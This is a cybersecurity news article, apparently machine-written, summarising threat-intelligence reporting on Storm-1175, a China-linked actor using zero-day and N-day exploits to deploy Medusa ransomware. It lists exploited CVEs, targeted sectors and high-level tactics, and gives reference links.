Today's cybersecurity headlines are brought to you by ThreatPerspective
Ethical Hacking News

The Looming Threat of Storm-1175: A China-Linked Cyber Actor Leveraging Zero-Days to Deploy Medusa Ransomware



A China-based threat actor known as Storm-1175 has been linked to the deployment of Medusa ransomware, leveraging zero-days to orchestrate rapid attacks on healthcare organizations, education institutions, professional services firms, and finance sectors across multiple regions. With its sophisticated tactics and ability to rotate exploits quickly, Storm-1175 poses a significant threat to global cybersecurity. Stay informed about emerging threats like this one with the latest news, expert insights, exclusive resources, and strategies from industry leaders – all for free.



  • Researchers identified a China-based threat actor called Storm-1175 linked to Medusa ransomware deployments.
  • Storm-1175 uses zero-day and N-day vulnerabilities to orchestrate rapid attacks on healthcare, education, and finance sectors in Australia, UK, and US.
  • The group creates persistence by creating new user accounts, deploying web shells, and interfering with security solutions.
  • Storm-1175 has exploited over 16 vulnerabilities across various platforms since 2023.
  • The group targets Linux systems, including Oracle WebLogic instances, with unknown exploit details.
  • The tactics employed by Storm-1175 are sophisticated and creative, using living-off-the-land binaries and RMM tools for covert operations.



    • In a recent and alarming development, researchers at Microsoft's Threat Intelligence team have identified a China-based threat actor known as Storm-1175, who has been linked to the deployment of Medusa ransomware. This threat actor, which has garnered significant attention for its high operational tempo and proficiency in identifying exposed perimeter assets, has been responsible for numerous "high-velocity" attacks that have heavily impacted healthcare organizations, as well as those in the education, professional services, and finance sectors across Australia, the United Kingdom, and the United States.

    The threat actor's modus operandi involves the weaponization of a combination of zero-day and N-day vulnerabilities to orchestrate these rapid deployments of Medusa ransomware. In some cases, Storm-1175 has leveraged zero-day exploits before they have been publicly disclosed, as well as recently disclosed vulnerabilities to obtain initial access. Furthermore, select incidents have involved the threat actor chaining together multiple exploits for post-compromise activity.

    Upon gaining a foothold within the compromised systems, the financially motivated cybercriminal actor swiftly moves to exfiltrate data and deploy Medusa ransomware within a span of a few days, or, in select incidents, within 24 hours. To aid in these efforts, the group creates persistence by creating new user accounts, deploying web shells or legitimate remote monitoring and management (RMM) software for lateral movement, conducting credential theft, and interfering with the normal functioning of security solutions.

    Since 2023, Storm-1175 has been linked to the exploitation of more than 16 vulnerabilities across various platforms. These vulnerabilities include CVE-2023-21529 (Microsoft Exchange Server), CVE-2023-27351 and CVE-2023-27350 (Papercut), CVE-2024-1708 and CVE-2024-1709 (ConnectWise ScreenConnect), CVE-2025-31161 (CrushFTP), CVE-2026-23760 (SmarterTools SmarterMail), and several others. Both CVE-2025-10035 and CVE-2026-23760 are said to have been exploited as zero-days prior to their public disclosure.

    As of late 2024, the hacking crew has exhibited a flair for targeting Linux systems, including exploiting vulnerable Oracle WebLogic instances across several organizations. However, the exact vulnerability being weaponized in these attacks remains unknown. The group's ability to rotate exploits quickly during the time between disclosure and patch availability or adoption is a significant concern, as it takes advantage of the period where many organizations remain unprotected.

    The tactics employed by Storm-1175 are noteworthy for their sophistication and creativity. Some of the notable methods observed in these attacks include the use of living-off-the-land binaries (LOTBins), such as PowerShell and PsExec, along with Impacket for lateral movement. Additionally, the group relies on PDQ Deployer for both lateral movement and payload delivery, including Medusa ransomware, across the network.

    Other tactics employed by Storm-1175 include modifying Windows Firewall policies to enable Remote Desktop Protocol (RDP) and deliver malicious payloads to other devices, carrying out credential dumping using Impacket and Mimikatz, configuring Microsoft Defender Antivirus exclusions to prevent it from blocking ransomware payloads, leveraging Bandizip and Rclone for data collection and exfiltration, respectively.

    Furthermore, the group's ability to utilize RMM tools like AnyDesk, Atera, MeshAgent, ConnectWise ScreenConnect, or SimpleHelp as dual-use infrastructure for covert operations is a significant concern. These tools allow threat actors to blend malicious traffic into trusted, encrypted platforms and reduce the likelihood of detection.

    The implications of Storm-1175's activities are far-reaching and alarming, highlighting the need for organizations to remain vigilant and proactive in their cybersecurity efforts. As the threat landscape continues to evolve, it is essential for individuals, businesses, and governments to stay informed about emerging threats and take steps to mitigate them.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/The-Looming-Threat-of-Storm-1175-A-China-Linked-Cyber-Actor-Leveraging-Zero-Days-to-Deploy-Medusa-Ransomware-ehn.shtml

  • https://thehackernews.com/2026/04/china-linked-storm-1175-exploits-zero.html

  • https://www.microsoft.com/en-us/security/blog/2026/04/06/storm-1175-focuses-gaze-on-vulnerable-web-facing-assets-in-high-tempo-medusa-ransomware-operations/

  • https://nvd.nist.gov/vuln/detail/CVE-2023-21529

  • https://www.cvedetails.com/cve/CVE-2023-21529/

  • https://nvd.nist.gov/vuln/detail/CVE-2023-27351

  • https://www.cvedetails.com/cve/CVE-2023-27351/

  • https://nvd.nist.gov/vuln/detail/CVE-2023-27350

  • https://www.cvedetails.com/cve/CVE-2023-27350/

  • https://nvd.nist.gov/vuln/detail/CVE-2024-1708

  • https://www.cvedetails.com/cve/CVE-2024-1708/

  • https://nvd.nist.gov/vuln/detail/CVE-2024-1709

  • https://www.cvedetails.com/cve/CVE-2024-1709/

  • https://nvd.nist.gov/vuln/detail/CVE-2025-31161

  • https://www.cvedetails.com/cve/CVE-2025-31161/

  • https://nvd.nist.gov/vuln/detail/CVE-2026-23760

  • https://www.cvedetails.com/cve/CVE-2026-23760/

  • https://nvd.nist.gov/vuln/detail/CVE-2025-10035

  • https://www.cvedetails.com/cve/CVE-2025-10035/

  • https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/

  • https://cloud.google.com/security/resources/insights/apt-groups


    • Published: Tue Apr 7 03:16:14 2026 by llama3.2 3B Q4_K_M


    © Ethical Hacking News . All rights reserved.

    Privacy | Terms of Use | Contact Us